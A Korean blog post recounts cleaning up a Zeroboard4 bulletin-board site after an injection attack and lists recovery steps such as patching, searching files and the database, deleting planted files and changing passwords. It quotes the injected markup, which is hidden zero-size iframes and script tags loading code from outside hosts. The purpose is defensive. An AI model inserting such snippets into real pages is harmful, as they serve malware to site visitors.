제로보드4 인젝션 공격후 사이트 복구기 

 

증상

 

1. 웹사이트가 이유없이 느려지거나 자바스크립트등의 에러가 발생

2. 게시판페이지에서 소스보기를 하면 못보던 스크립트가 보인다

대충 아래와 같은 형태이다

 

 

<script src=www.geto.co.kr/state/x.js></script><?ob_start();?><?ob_start();?><?ob_start();?><iframesrc="http://www.ro521.com/test.htm" width=0 height=0></iframe><?ob_start();?><script src="http://j5b.kr/bin/h.js"></script>

 

<?ob_start();?><?ob_start();?><?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe><?ob_start();?><script src="http://j5b.kr/bin/h.js"></script>

 

조치

 

1. 제로보드4를 최신버전으로 패치한다. 물론 소스코드를 변경한것이 있으면 모두 수정해 주어야한다.. ㅡ.ㅡ

2. data 디렉토리를 제외한 모든 파일을 다운로드, 혹은 tar 로 묶어 다운로드하여 문제의코드를 찾아내어 모두 삭제한다

 

tar cvfzp public_html.tar.gz --exclude=/public_html/bbs/data --exclude=/public_html/bbs/data2 /bbs

(data,data2 디렉토리를 제외한 모든 파일 압축)

 

코드검색은 로컬에서 에디트플러스의 여러파일에서모두검색 기능을 사용하였다

 

 

3. phpMyadmin 등의 db관리툴로 db 를 sql 로 백업받고, 역시 로컬에서 에디트플러스 등을 사용하여 문제의 코드를 검색, 삭제한다

 

4. bbs/icon 디렉토리에 아래 두가지의 파일이 있나 확인하고 삭제한다

 

group_qazwsxedc.jpg

visitLog.php

 

특히 visitLog.php 파일은 악성코드 유포를 시키게 하는 파일이며, 다른 폴더에도 서식할 수 있으므로 모두 찾아 없앤다

 

5. db,ftp 비밀번호를 변경하고 주기적으로 변경해준다

 

6. 팀장닷컴에서 제공하는 무료웹방화벽을 설치하였다

 

 

그래도 여전히 구글크롬이나 사파리,파이어폭스에서는 경고창이 뜬다...ㅡ.ㅡ

 

  • Lv16
    전 그런 공격받은 적 한번도 없었는데
    포레스트님은 그런 공격받으셨었네요.
    지난 일이지만 사이트 무사히 잘 복구하셔서
    참 다행이예요.
  • Lv16 Lv6
    네, 저때 애좀 먹었습니다. ^^